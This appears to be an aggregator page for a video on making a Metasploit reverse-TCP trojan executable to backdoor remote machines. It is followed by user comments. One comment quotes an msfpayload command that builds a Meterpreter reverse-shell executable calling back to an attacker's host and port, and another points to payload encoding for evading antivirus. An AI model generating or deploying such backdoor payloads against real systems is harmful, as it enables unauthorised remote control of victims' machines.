Description:
This is just a basic insight into making a reverse tcp exe acts as a trojan some can say and can act as a back door to a remote machine you must have some knowledge of linux and backtrack and metasploit but having said that it is very easy to learn anyone can do this !
This video was created by Slayer231091 and referred to us by netinfinity.
You can visit this blog here for more interesting articles on security and hacking.
Tags: basics ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Comments:
i got this prob bro...
msf3]# ./msfpayload windows/meterpreter/reverse_tcp LHOST 192.1xx.2.xxx LPORT 4444 x > /root/reverse_tcp.exe
Error generating payload: The argument could not be parsed correctly.
pls help me how to fix it
Thanks man, that really helped me learn Meterpreter 101 since I'm new to it. Everything you did I was able to re-create! Had to mute you though, music is rough. Thanks again.
Just to add on to this, there's an article here that explains the encoding process along with how it helps avoid antivirus detection. Metasploit offers several built in encoding schemes.
http://technology-flow.com/articles/metasploit-encoding-antivirus-detection/
Para conhecer o metasploit mais a fundo visite o fórum Amantes do Metasploit
http://www.amantesdometasploit.com.br